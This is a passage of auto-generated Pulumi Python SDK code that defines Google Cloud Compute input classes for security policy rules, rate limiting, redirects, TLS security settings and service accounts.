if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ports is not None:
pulumi.set(__self__, "ports", ports)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp), or the IP protocol number.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An optional list of ports to which this rule applies. This field is only applicable for UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"]. This field may only be specified when versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ports", value)
@pulumi.input_type
class SecurityPolicyRuleMatcherConfigArgs:
def __init__(__self__, *,
dest_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
layer4_configs: Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleMatcherConfigLayer4ConfigArgs']]]] = None,
src_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] dest_ip_ranges: CIDR IP address range. This field may only be specified when versioned_expr is set to FIREWALL.
:param pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleMatcherConfigLayer4ConfigArgs']]] layer4_configs: Pairs of IP protocols and ports that the rule should match. This field may only be specified when versioned_expr is set to FIREWALL.
:param pulumi.Input[Sequence[pulumi.Input[str]]] src_ip_ranges: CIDR IP address range. Maximum number of src_ip_ranges allowed is 10.
"""
if dest_ip_ranges is not None:
pulumi.set(__self__, "dest_ip_ranges", dest_ip_ranges)
if layer4_configs is not None:
pulumi.set(__self__, "layer4_configs", layer4_configs)
if src_ip_ranges is not None:
pulumi.set(__self__, "src_ip_ranges", src_ip_ranges)
@property
@pulumi.getter(name="destIpRanges")
def dest_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
CIDR IP address range. This field may only be specified when versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "dest_ip_ranges")
@dest_ip_ranges.setter
def dest_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dest_ip_ranges", value)
@property
@pulumi.getter(name="layer4Configs")
def layer4_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleMatcherConfigLayer4ConfigArgs']]]]:
"""
Pairs of IP protocols and ports that the rule should match. This field may only be specified when versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "layer4_configs")
@layer4_configs.setter
def layer4_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SecurityPolicyRuleMatcherConfigLayer4ConfigArgs']]]]):
pulumi.set(self, "layer4_configs", value)
@property
@pulumi.getter(name="srcIpRanges")
def src_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
CIDR IP address range. Maximum number of src_ip_ranges allowed is 10.
"""
return pulumi.get(self, "src_ip_ranges")
@src_ip_ranges.setter
def src_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "src_ip_ranges", value)
@pulumi.input_type
class SecurityPolicyRuleMatcherArgs:
def __init__(__self__, *,
config: Optional[pulumi.Input['SecurityPolicyRuleMatcherConfigArgs']] = None,
expr: Optional[pulumi.Input['ExprArgs']] = None,
versioned_expr: Optional[pulumi.Input['SecurityPolicyRuleMatcherVersionedExpr']] = None):
"""
Represents a match condition that incoming traffic is evaluated against. Exactly one field must be specified.
:param pulumi.Input['SecurityPolicyRuleMatcherConfigArgs'] config: The configuration options available when specifying versioned_expr. This field must be specified if versioned_expr is specified and cannot be specified if versioned_expr is not specified.
:param pulumi.Input['ExprArgs'] expr: User defined CEVAL expression. A CEVAL expression is used to specify match criteria such as origin.ip, source.region_code and contents in the request header.
:param pulumi.Input['SecurityPolicyRuleMatcherVersionedExpr'] versioned_expr: Preconfigured versioned expression. If this field is specified, config must also be specified. Available preconfigured expressions along with their requirements are: SRC_IPS_V1 - must specify the corresponding src_ip_range field in config.
"""
if config is not None:
pulumi.set(__self__, "config", config)
if expr is not None:
pulumi.set(__self__, "expr", expr)
if versioned_expr is not None:
pulumi.set(__self__, "versioned_expr", versioned_expr)
@property
@pulumi.getter
def config(self) -> Optional[pulumi.Input['SecurityPolicyRuleMatcherConfigArgs']]:
"""
The configuration options available when specifying versioned_expr. This field must be specified if versioned_expr is specified and cannot be specified if versioned_expr is not specified.
"""
return pulumi.get(self, "config")
@config.setter
def config(self, value: Optional[pulumi.Input['SecurityPolicyRuleMatcherConfigArgs']]):
pulumi.set(self, "config", value)
@property
@pulumi.getter
def expr(self) -> Optional[pulumi.Input['ExprArgs']]:
"""
User defined CEVAL expression. A CEVAL expression is used to specify match criteria such as origin.ip, source.region_code and contents in the request header.
"""
return pulumi.get(self, "expr")
@expr.setter
def expr(self, value: Optional[pulumi.Input['ExprArgs']]):
pulumi.set(self, "expr", value)
@property
@pulumi.getter(name="versionedExpr")
def versioned_expr(self) -> Optional[pulumi.Input['SecurityPolicyRuleMatcherVersionedExpr']]:
"""
Preconfigured versioned expression. If this field is specified, config must also be specified. Available preconfigured expressions along with their requirements are: SRC_IPS_V1 - must specify the corresponding src_ip_range field in config.
"""
return pulumi.get(self, "versioned_expr")
@versioned_expr.setter
def versioned_expr(self, value: Optional[pulumi.Input['SecurityPolicyRuleMatcherVersionedExpr']]):
pulumi.set(self, "versioned_expr", value)
@pulumi.input_type
class SecurityPolicyRuleRateLimitOptionsThresholdArgs:
def __init__(__self__, *,
count: Optional[pulumi.Input[int]] = None,
interval_sec: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] count: Number of HTTP(S) requests for calculating the threshold.
:param pulumi.Input[int] interval_sec: Interval over which the threshold is computed.
"""
if count is not None:
pulumi.set(__self__, "count", count)
if interval_sec is not None:
pulumi.set(__self__, "interval_sec", interval_sec)
@property
@pulumi.getter
def count(self) -> Optional[pulumi.Input[int]]:
"""
Number of HTTP(S) requests for calculating the threshold.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="intervalSec")
def interval_sec(self) -> Optional[pulumi.Input[int]]:
"""
Interval over which the threshold is computed.
"""
return pulumi.get(self, "interval_sec")
@interval_sec.setter
def interval_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval_sec", value)
@pulumi.input_type
class SecurityPolicyRuleRateLimitOptionsArgs:
def __init__(__self__, *,
ban_duration_sec: Optional[pulumi.Input[int]] = None,
ban_threshold: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']] = None,
conform_action: Optional[pulumi.Input[str]] = None,
enforce_on_key: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsEnforceOnKey']] = None,
enforce_on_key_name: Optional[pulumi.Input[str]] = None,
exceed_action: Optional[pulumi.Input[str]] = None,
exceed_redirect_options: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']] = None,
rate_limit_threshold: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']] = None):
"""
:param pulumi.Input[int] ban_duration_sec: Can only be specified if the action for the rule is "rate_based_ban". If specified, determines the time (in seconds) the traffic will continue to be banned by the rate limit after the rate falls below the threshold.
:param pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs'] ban_threshold: Can only be specified if the action for the rule is "rate_based_ban". If specified, the key will be banned for the configured 'ban_duration_sec' when the number of requests that exceed the 'rate_limit_threshold' also exceed this 'ban_threshold'.
:param pulumi.Input[str] conform_action: Action to take for requests that are under the configured rate limit threshold. Valid option is "allow" only.
:param pulumi.Input['SecurityPolicyRuleRateLimitOptionsEnforceOnKey'] enforce_on_key: Determines the key to enforce the rate_limit_threshold on. Possible values are: - ALL: A single rate limit threshold is applied to all the requests matching this rule. This is the default value if this field 'enforce_on_key' is not configured. - IP: The source IP address of the request is the key. Each IP has this limit enforced separately. - HTTP_HEADER: The value of the HTTP header whose name is configured under "enforce_on_key_name". The key value is truncated to the first 128 bytes of the header value. If no such header is present in the request, the key type defaults to ALL. - XFF_IP: The first IP address (i.e. the originating client IP address) specified in the list of IPs under X-Forwarded-For HTTP header. If no such header is present or the value is not a valid IP, the key type defaults to ALL. - HTTP_COOKIE: The value of the HTTP cookie whose name is configured under "enforce_on_key_name". The key value is truncated to the first 128 bytes of the cookie value. If no such cookie is present in the request, the key type defaults to ALL.
:param pulumi.Input[str] enforce_on_key_name: Rate limit key name applicable only for the following key types: HTTP_HEADER -- Name of the HTTP header whose value is taken as the key value. HTTP_COOKIE -- Name of the HTTP cookie whose value is taken as the key value.
:param pulumi.Input[str] exceed_action: Action to take for requests that are above the configured rate limit threshold, to either deny with a specified HTTP response code, or redirect to a different endpoint. Valid options are "deny()" where valid values for status are 403, 404, 429, and 502, and "redirect" where the redirect parameters come from exceed_redirect_options below.
:param pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs'] exceed_redirect_options: Parameters defining the redirect action that is used as the exceed action. Cannot be specified if the exceed action is not redirect.
:param pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs'] rate_limit_threshold: Threshold at which to begin ratelimiting.
"""
if ban_duration_sec is not None:
pulumi.set(__self__, "ban_duration_sec", ban_duration_sec)
if ban_threshold is not None:
pulumi.set(__self__, "ban_threshold", ban_threshold)
if conform_action is not None:
pulumi.set(__self__, "conform_action", conform_action)
if enforce_on_key is not None:
pulumi.set(__self__, "enforce_on_key", enforce_on_key)
if enforce_on_key_name is not None:
pulumi.set(__self__, "enforce_on_key_name", enforce_on_key_name)
if exceed_action is not None:
pulumi.set(__self__, "exceed_action", exceed_action)
if exceed_redirect_options is not None:
pulumi.set(__self__, "exceed_redirect_options", exceed_redirect_options)
if rate_limit_threshold is not None:
pulumi.set(__self__, "rate_limit_threshold", rate_limit_threshold)
@property
@pulumi.getter(name="banDurationSec")
def ban_duration_sec(self) -> Optional[pulumi.Input[int]]:
"""
Can only be specified if the action for the rule is "rate_based_ban". If specified, determines the time (in seconds) the traffic will continue to be banned by the rate limit after the rate falls below the threshold.
"""
return pulumi.get(self, "ban_duration_sec")
@ban_duration_sec.setter
def ban_duration_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ban_duration_sec", value)
@property
@pulumi.getter(name="banThreshold")
def ban_threshold(self) -> Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']]:
"""
Can only be specified if the action for the rule is "rate_based_ban". If specified, the key will be banned for the configured 'ban_duration_sec' when the number of requests that exceed the 'rate_limit_threshold' also exceed this 'ban_threshold'.
"""
return pulumi.get(self, "ban_threshold")
@ban_threshold.setter
def ban_threshold(self, value: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']]):
pulumi.set(self, "ban_threshold", value)
@property
@pulumi.getter(name="conformAction")
def conform_action(self) -> Optional[pulumi.Input[str]]:
"""
Action to take for requests that are under the configured rate limit threshold. Valid option is "allow" only.
"""
return pulumi.get(self, "conform_action")
@conform_action.setter
def conform_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "conform_action", value)
@property
@pulumi.getter(name="enforceOnKey")
def enforce_on_key(self) -> Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsEnforceOnKey']]:
"""
Determines the key to enforce the rate_limit_threshold on. Possible values are: - ALL: A single rate limit threshold is applied to all the requests matching this rule. This is the default value if this field 'enforce_on_key' is not configured. - IP: The source IP address of the request is the key. Each IP has this limit enforced separately. - HTTP_HEADER: The value of the HTTP header whose name is configured under "enforce_on_key_name". The key value is truncated to the first 128 bytes of the header value. If no such header is present in the request, the key type defaults to ALL. - XFF_IP: The first IP address (i.e. the originating client IP address) specified in the list of IPs under X-Forwarded-For HTTP header. If no such header is present or the value is not a valid IP, the key type defaults to ALL. - HTTP_COOKIE: The value of the HTTP cookie whose name is configured under "enforce_on_key_name". The key value is truncated to the first 128 bytes of the cookie value. If no such cookie is present in the request, the key type defaults to ALL.
"""
return pulumi.get(self, "enforce_on_key")
@enforce_on_key.setter
def enforce_on_key(self, value: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsEnforceOnKey']]):
pulumi.set(self, "enforce_on_key", value)
@property
@pulumi.getter(name="enforceOnKeyName")
def enforce_on_key_name(self) -> Optional[pulumi.Input[str]]:
"""
Rate limit key name applicable only for the following key types: HTTP_HEADER -- Name of the HTTP header whose value is taken as the key value. HTTP_COOKIE -- Name of the HTTP cookie whose value is taken as the key value.
"""
return pulumi.get(self, "enforce_on_key_name")
@enforce_on_key_name.setter
def enforce_on_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "enforce_on_key_name", value)
@property
@pulumi.getter(name="exceedAction")
def exceed_action(self) -> Optional[pulumi.Input[str]]:
"""
Action to take for requests that are above the configured rate limit threshold, to either deny with a specified HTTP response code, or redirect to a different endpoint. Valid options are "deny()" where valid values for status are 403, 404, 429, and 502, and "redirect" where the redirect parameters come from exceed_redirect_options below.
"""
return pulumi.get(self, "exceed_action")
@exceed_action.setter
def exceed_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exceed_action", value)
@property
@pulumi.getter(name="exceedRedirectOptions")
def exceed_redirect_options(self) -> Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']]:
"""
Parameters defining the redirect action that is used as the exceed action. Cannot be specified if the exceed action is not redirect.
"""
return pulumi.get(self, "exceed_redirect_options")
@exceed_redirect_options.setter
def exceed_redirect_options(self, value: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']]):
pulumi.set(self, "exceed_redirect_options", value)
@property
@pulumi.getter(name="rateLimitThreshold")
def rate_limit_threshold(self) -> Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']]:
"""
Threshold at which to begin ratelimiting.
"""
return pulumi.get(self, "rate_limit_threshold")
@rate_limit_threshold.setter
def rate_limit_threshold(self, value: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsThresholdArgs']]):
pulumi.set(self, "rate_limit_threshold", value)
@pulumi.input_type
class SecurityPolicyRuleRedirectOptionsArgs:
def __init__(__self__, *,
target: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsType']] = None):
"""
:param pulumi.Input[str] target: Target for the redirect action. This is required if the type is EXTERNAL_302 and cannot be specified for GOOGLE_RECAPTCHA.
:param pulumi.Input['SecurityPolicyRuleRedirectOptionsType'] type: Type of the redirect action.
"""
if target is not None:
pulumi.set(__self__, "target", target)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
Target for the redirect action. This is required if the type is EXTERNAL_302 and cannot be specified for GOOGLE_RECAPTCHA.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsType']]:
"""
Type of the redirect action.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class SecurityPolicyRuleArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
direction: Optional[pulumi.Input['SecurityPolicyRuleDirection']] = None,
enable_logging: Optional[pulumi.Input[bool]] = None,
header_action: Optional[pulumi.Input['SecurityPolicyRuleHttpHeaderActionArgs']] = None,
match: Optional[pulumi.Input['SecurityPolicyRuleMatcherArgs']] = None,
preview: Optional[pulumi.Input[bool]] = None,
priority: Optional[pulumi.Input[int]] = None,
rate_limit_options: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsArgs']] = None,
redirect_options: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']] = None,
rule_number: Optional[pulumi.Input[str]] = None,
target_resources: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
target_service_accounts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Represents a rule that describes one or more match conditions along with the action to be taken when traffic matches this condition (allow or deny).
:param pulumi.Input[str] action: The Action to perform when the rule is matched. The following are the valid actions: - allow: allow access to target. - deny(): deny access to target, returns the HTTP response code specified (valid values are 403, 404, and 502). - rate_based_ban: limit client traffic to the configured threshold and ban the client if the traffic exceeds the threshold. Configure parameters for this action in RateLimitOptions. Requires rate_limit_options to be set. - redirect: redirect to a different target. This can either be an internal reCAPTCHA redirect, or an external URL-based redirect via a 302 response. Parameters for this action can be configured via redirectOptions. - throttle: limit client traffic to the configured threshold. Configure parameters for this action in rateLimitOptions. Requires rate_limit_options to be set for this.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when you create the resource.
:param pulumi.Input['SecurityPolicyRuleDirection'] direction: The direction in which this rule applies. This field may only be specified when versioned_expr is set to FIREWALL.
:param pulumi.Input[bool] enable_logging: Denotes whether to enable logging for a particular rule. If logging is enabled, logs will be exported to the configured export destination in Stackdriver. Logs may be exported to BigQuery or Pub/Sub. Note: you cannot enable logging on "goto_next" rules. This field may only be specified when the versioned_expr is set to FIREWALL.
:param pulumi.Input['SecurityPolicyRuleHttpHeaderActionArgs'] header_action: Optional, additional actions that are performed on headers.
:param pulumi.Input['SecurityPolicyRuleMatcherArgs'] match: A match condition that incoming traffic is evaluated against. If it evaluates to true, the corresponding 'action' is enforced.
:param pulumi.Input[bool] preview: If set to true, the specified action is not enforced.
:param pulumi.Input[int] priority: An integer indicating the priority of a rule in the list. The priority must be a positive value between 0 and 2147483647. Rules are evaluated from highest to lowest priority where 0 is the highest priority and 2147483647 is the lowest priority.
:param pulumi.Input['SecurityPolicyRuleRateLimitOptionsArgs'] rate_limit_options: Must be specified if the action is "rate_based_ban" or "throttle". Cannot be specified for any other actions.
:param pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs'] redirect_options: Parameters defining the redirect action. Cannot be specified for any other actions.
:param pulumi.Input[str] rule_number: Identifier for the rule. This is only unique within the given security policy. This can only be set during rule creation, if rule number is not specified it will be generated by the server.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_resources: A list of network resource URLs to which this rule applies. This field allows you to control which network's VMs get this rule. If this field is left blank, all VMs within the organization will receive the rule. This field may only be specified when versioned_expr is set to FIREWALL.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_service_accounts: A list of service accounts indicating the sets of instances that are applied with this rule.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if description is not None:
pulumi.set(__self__, "description", description)
if direction is not None:
pulumi.set(__self__, "direction", direction)
if enable_logging is not None:
pulumi.set(__self__, "enable_logging", enable_logging)
if header_action is not None:
pulumi.set(__self__, "header_action", header_action)
if match is not None:
pulumi.set(__self__, "match", match)
if preview is not None:
pulumi.set(__self__, "preview", preview)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if rate_limit_options is not None:
pulumi.set(__self__, "rate_limit_options", rate_limit_options)
if redirect_options is not None:
pulumi.set(__self__, "redirect_options", redirect_options)
if rule_number is not None:
pulumi.set(__self__, "rule_number", rule_number)
if target_resources is not None:
pulumi.set(__self__, "target_resources", target_resources)
if target_service_accounts is not None:
pulumi.set(__self__, "target_service_accounts", target_service_accounts)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input[str]]:
"""
The Action to perform when the rule is matched. The following are the valid actions: - allow: allow access to target. - deny(): deny access to target, returns the HTTP response code specified (valid values are 403, 404, and 502). - rate_based_ban: limit client traffic to the configured threshold and ban the client if the traffic exceeds the threshold. Configure parameters for this action in RateLimitOptions. Requires rate_limit_options to be set. - redirect: redirect to a different target. This can either be an internal reCAPTCHA redirect, or an external URL-based redirect via a 302 response. Parameters for this action can be configured via redirectOptions. - throttle: limit client traffic to the configured threshold. Configure parameters for this action in rateLimitOptions. Requires rate_limit_options to be set for this.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def direction(self) -> Optional[pulumi.Input['SecurityPolicyRuleDirection']]:
"""
The direction in which this rule applies. This field may only be specified when versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[pulumi.Input['SecurityPolicyRuleDirection']]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter(name="enableLogging")
def enable_logging(self) -> Optional[pulumi.Input[bool]]:
"""
Denotes whether to enable logging for a particular rule. If logging is enabled, logs will be exported to the configured export destination in Stackdriver. Logs may be exported to BigQuery or Pub/Sub. Note: you cannot enable logging on "goto_next" rules. This field may only be specified when the versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "enable_logging")
@enable_logging.setter
def enable_logging(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_logging", value)
@property
@pulumi.getter(name="headerAction")
def header_action(self) -> Optional[pulumi.Input['SecurityPolicyRuleHttpHeaderActionArgs']]:
"""
Optional, additional actions that are performed on headers.
"""
return pulumi.get(self, "header_action")
@header_action.setter
def header_action(self, value: Optional[pulumi.Input['SecurityPolicyRuleHttpHeaderActionArgs']]):
pulumi.set(self, "header_action", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['SecurityPolicyRuleMatcherArgs']]:
"""
A match condition that incoming traffic is evaluated against. If it evaluates to true, the corresponding 'action' is enforced.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['SecurityPolicyRuleMatcherArgs']]):
pulumi.set(self, "match", value)
@property
@pulumi.getter
def preview(self) -> Optional[pulumi.Input[bool]]:
"""
If set to true, the specified action is not enforced.
"""
return pulumi.get(self, "preview")
@preview.setter
def preview(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "preview", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
An integer indicating the priority of a rule in the list. The priority must be a positive value between 0 and 2147483647. Rules are evaluated from highest to lowest priority where 0 is the highest priority and 2147483647 is the lowest priority.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="rateLimitOptions")
def rate_limit_options(self) -> Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsArgs']]:
"""
Must be specified if the action is "rate_based_ban" or "throttle". Cannot be specified for any other actions.
"""
return pulumi.get(self, "rate_limit_options")
@rate_limit_options.setter
def rate_limit_options(self, value: Optional[pulumi.Input['SecurityPolicyRuleRateLimitOptionsArgs']]):
pulumi.set(self, "rate_limit_options", value)
@property
@pulumi.getter(name="redirectOptions")
def redirect_options(self) -> Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']]:
"""
Parameters defining the redirect action. Cannot be specified for any other actions.
"""
return pulumi.get(self, "redirect_options")
@redirect_options.setter
def redirect_options(self, value: Optional[pulumi.Input['SecurityPolicyRuleRedirectOptionsArgs']]):
pulumi.set(self, "redirect_options", value)
@property
@pulumi.getter(name="ruleNumber")
def rule_number(self) -> Optional[pulumi.Input[str]]:
"""
Identifier for the rule. This is only unique within the given security policy. This can only be set during rule creation, if rule number is not specified it will be generated by the server.
"""
return pulumi.get(self, "rule_number")
@rule_number.setter
def rule_number(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_number", value)
@property
@pulumi.getter(name="targetResources")
def target_resources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of network resource URLs to which this rule applies. This field allows you to control which network's VMs get this rule. If this field is left blank, all VMs within the organization will receive the rule. This field may only be specified when versioned_expr is set to FIREWALL.
"""
return pulumi.get(self, "target_resources")
@target_resources.setter
def target_resources(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_resources", value)
@property
@pulumi.getter(name="targetServiceAccounts")
def target_service_accounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of service accounts indicating the sets of instances that are applied with this rule.
"""
return pulumi.get(self, "target_service_accounts")
@target_service_accounts.setter
def target_service_accounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_service_accounts", value)
@pulumi.input_type
class SecuritySettingsArgs:
def __init__(__self__, *,
client_tls_policy: Optional[pulumi.Input[str]] = None,
subject_alt_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The authentication and authorization settings for a BackendService.
:param pulumi.Input[str] client_tls_policy: Optional. A URL referring to a networksecurity.ClientTlsPolicy resource that describes how clients should authenticate with this service's backends. clientTlsPolicy only applies to a global BackendService with the loadBalancingScheme set to INTERNAL_SELF_MANAGED. If left blank, communications are not encrypted. Note: This field currently has no impact.
:param pulumi.Input[Sequence[pulumi.Input[str]]] subject_alt_names: Optional. A list of Subject Alternative Names (SANs) that the client verifies during a mutual TLS handshake with an server/endpoint for this BackendService. When the server presents its X.509 certificate to the client, the client inspects the certificate's subjectAltName field. If the field contains one of the specified values, the communication continues. Otherwise, it fails. This additional check enables the client to verify that the server is authorized to run the requested service. Note that the contents of the server certificate's subjectAltName field are configured by the Public Key Infrastructure which provisions server identities. Only applies to a global BackendService with loadBalancingScheme set to INTERNAL_SELF_MANAGED. Only applies when BackendService has an attached clientTlsPolicy with clientCertificate (mTLS mode). Note: This field currently has no impact.
"""
if client_tls_policy is not None:
pulumi.set(__self__, "client_tls_policy", client_tls_policy)
if subject_alt_names is not None:
pulumi.set(__self__, "subject_alt_names", subject_alt_names)
@property
@pulumi.getter(name="clientTlsPolicy")
def client_tls_policy(self) -> Optional[pulumi.Input[str]]:
"""
Optional. A URL referring to a networksecurity.ClientTlsPolicy resource that describes how clients should authenticate with this service's backends. clientTlsPolicy only applies to a global BackendService with the loadBalancingScheme set to INTERNAL_SELF_MANAGED. If left blank, communications are not encrypted. Note: This field currently has no impact.
"""
return pulumi.get(self, "client_tls_policy")
@client_tls_policy.setter
def client_tls_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_tls_policy", value)
@property
@pulumi.getter(name="subjectAltNames")
def subject_alt_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Optional. A list of Subject Alternative Names (SANs) that the client verifies during a mutual TLS handshake with an server/endpoint for this BackendService. When the server presents its X.509 certificate to the client, the client inspects the certificate's subjectAltName field. If the field contains one of the specified values, the communication continues. Otherwise, it fails. This additional check enables the client to verify that the server is authorized to run the requested service. Note that the contents of the server certificate's subjectAltName field are configured by the Public Key Infrastructure which provisions server identities. Only applies to a global BackendService with loadBalancingScheme set to INTERNAL_SELF_MANAGED. Only applies when BackendService has an attached clientTlsPolicy with clientCertificate (mTLS mode). Note: This field currently has no impact.
"""
return pulumi.get(self, "subject_alt_names")
@subject_alt_names.setter
def subject_alt_names(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "subject_alt_names", value)
@pulumi.input_type
class ServerBindingArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ServerBindingType']] = None):
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ServerBindingType']]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ServerBindingType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServiceAccountArgs:
def __init__(__self__, *,
email: Optional[pulumi.Input[str]] = None,
scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
A service account.
:param pulumi.Input[str] email: Email address of the service account.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scopes: The list of scopes to be made available for this service account.
"""
if email is not None:
pulumi.set(__self__, "email", email)
if scopes is not None:
pulumi.set(__self__, "scopes", scopes)
@property
@pulumi.getter
def email(self) -> Optional[pulumi.Input[str]]:
"""
Email address of the service account.
"""
return pulumi.get(self, "email")
@email.setter
def email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "email", value)
@property
@pulumi.getter
def scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of scopes to be made available for this service account.
"""
return pulumi.get(self, "scopes")
@scopes.setter
def scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scopes", value)
@pulumi.input_type
class ServiceAttachmentConsumerProjectLimitArgs:
def __init__(__self__, *,
connection_limit: Optional[pulumi.Input[int]] = None,
project_id_or_num: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] connection_limit: The value of the limit to set.
:param pulumi.Input[str] project_id_or_num: The project id or number for the project to set the limit for.
"""
if connection_limit is not None:
pulumi.set(__self__, "connection_limit", connection_limit)
if project_id_or_num is not None:
pulumi.set(__self__, "project_id_or_num", project_id_or_num)
@property
@pulumi.getter(name="connectionLimit")
